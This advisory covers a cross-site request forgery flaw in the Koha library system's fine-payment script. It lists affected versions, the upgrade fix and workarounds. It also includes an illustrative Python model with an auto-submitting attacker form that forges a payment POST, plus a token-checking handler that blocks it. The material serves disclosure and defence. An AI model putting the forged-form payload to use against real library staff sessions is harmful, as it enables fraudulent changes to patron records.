PT-2018-9521 · Bywater Solutions · Koha Library System

Jiaky Ooi

Published 2018-09-06 · Updated 2018-11-07

CVE-2018-1000669

CVSS v3.1: 8.8 (High)

Vector: AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
Name of the Vulnerable Software and Affected Versions

Koha Library System versions 16.11.x through 16.11.13
Koha Library System versions 17.05.x through 17.05.05

Description

A Cross-Site Request Forgery (CSRF) vulnerability in /cgi-bin/koha/members/paycollect.pl, the staff-interface script that records payments of patron fines, lets an attacker mark a patron's fines as paid on behalf of a logged-in staff user. The script acts on the POST parameters borrowernumber, amount, amountoutstanding, and paid with no check beyond the session cookie, and the victim's browser attaches that cookie to a cross-site request automatically. Exploitation requires social engineering: the victim, while authenticated to the staff client, is tricked into opening an attacker-controlled link, usually sent by email. This is why the CVSS vector carries PR:N (the attacker needs no account) together with UI:R (the victim must act).

Recommendations

For versions 16.11.x through 16.11.13 and 17.05.x through 17.05.05, update to version 17.11 or later, where the issue is fixed. As a temporary workaround, restrict access to the staff interface (including /cgi-bin/koha/members/paycollect.pl) to trusted networks, and have staff log out of the staff client before following untrusted links, since a forged request only succeeds while the victim holds an authenticated session. Network restriction does not remove the flaw: a forged request from a browser that can already reach the staff interface is still accepted until the upgrade is applied.
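As an added illustration, not Koha's own Perl code and not the fix the project shipped in 17.11, the following Python models the request pattern described above: a handler that honours any POST arriving with a valid session cookie, the auto-submitting form a phishing link would lead the staff user to, and a hardened handler that additionally demands a per-session CSRF token (one standard mitigation for this bug class). The hostname, session layout, fine balance and attacker page are constructed for the example.

```python
"""Model of the CSRF in paycollect.pl and a per-session token check that closes it.
Illustrative code only: session layout, fine storage, hostname and the attacker's
page are constructed for this example and are not Koha's data model or source."""
import hashlib
import hmac
import secrets
from urllib.parse import parse_qs, urlencode

# Hypothetical staff-client URL; only the script path comes from the advisory.
PAYCOLLECT = "https://staff.example.org/cgi-bin/koha/members/paycollect.pl"


def new_state():
    """Constructed sample state: one logged-in staff session and one patron with a fine."""
    sessions = {"CGISESSID=a1b2c3": {"user": "librarian", "secret": secrets.token_bytes(32)}}
    fines = {"42": 12.50}  # borrowernumber -> outstanding balance
    return sessions, fines


def parse_body(body):
    """Flatten an application/x-www-form-urlencoded body to a single-valued dict."""
    return {k: v[0] for k, v in parse_qs(body).items()}


def apply_payment(fines, params):
    """The state change the endpoint performs: reduce the patron's balance by 'paid'."""
    bn = params["borrowernumber"]
    fines[bn] = round(max(0.0, fines[bn] - float(params["paid"])), 2)
    return fines[bn]


def vulnerable_paycollect(sessions, fines, cookie, body):
    """Pre-17.11 pattern: a valid session cookie is the only check, so any POST the
    victim's browser sends while logged in is honoured, whoever built the form."""
    if cookie not in sessions:
        return 403, None
    return 200, apply_payment(fines, parse_body(body))


def csrf_token(sessions, cookie):
    """Per-session token: HMAC of the session id under a secret stored with the
    session. It is embedded in the legitimate form, which only a page served
    inside the session (same origin) can read; a cross-site page cannot."""
    return hmac.new(sessions[cookie]["secret"], cookie.encode(), hashlib.sha256).hexdigest()


def hardened_paycollect(sessions, fines, cookie, body):
    """Same endpoint plus a token check: the POST must carry csrf_token equal to
    the session's value, compared in constant time."""
    if cookie not in sessions:
        return 403, None
    params = parse_body(body)
    if not hmac.compare_digest(params.get("csrf_token", ""), csrf_token(sessions, cookie)):
        return 403, None
    return 200, apply_payment(fines, params)


# The four parameters named in the advisory, with attacker-chosen values.
ATTACKER_FIELDS = {"borrowernumber": "42", "amount": "12.50",
                   "amountoutstanding": "12.50", "paid": "12.50"}


def attacker_page():
    """Hypothetical page a phishing link could lead to: an auto-submitting form
    aimed at paycollect.pl. It never needs to read the victim's cookie."""
    inputs = "".join(f'<input type="hidden" name="{k}" value="{v}">'
                     for k, v in ATTACKER_FIELDS.items())
    return (f'<form id="f" method="POST" action="{PAYCOLLECT}">{inputs}</form>'
            '<script>document.getElementById("f").submit()</script>')


def run_demo():
    """Replay the forged POST against both handlers, then a legitimate in-session
    POST against the hardened one. The browser attaching the staff cookie to the
    cross-site POST is the whole attack; the token is what the attacker cannot supply."""
    forged_body = urlencode(ATTACKER_FIELDS)  # exactly the fields in attacker_page()

    sessions, fines = new_state()
    cookie = next(iter(sessions))
    v_status, v_balance = vulnerable_paycollect(sessions, fines, cookie, forged_body)

    sessions, fines = new_state()
    cookie = next(iter(sessions))
    h_status, _ = hardened_paycollect(sessions, fines, cookie, forged_body)
    h_balance = fines["42"]  # unchanged: the forged request carried no token

    legit_body = urlencode({**ATTACKER_FIELDS, "csrf_token": csrf_token(sessions, cookie)})
    l_status, l_balance = hardened_paycollect(sessions, fines, cookie, legit_body)
    return (v_status, v_balance), (h_status, h_balance), (l_status, l_balance)


if __name__ == "__main__":
    print(attacker_page())
    print(run_demo())
```

Running the block prints the attacker's form and the triple of outcomes: the unprotected handler clears the fine from a request the staff user never intended, the token-checking handler rejects the same request with 403 and leaves the balance untouched, and the genuine staff form, which carries the token, still works. Setting the session cookie with a SameSite attribute is a useful defence in depth, but it does not replace the token check, which is why the upgrade is the real fix.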

Exploit

Fix

CSRF


Weakness Enumeration

Related identifiers

CVE-2018-1000669

Affected products

Koha Library System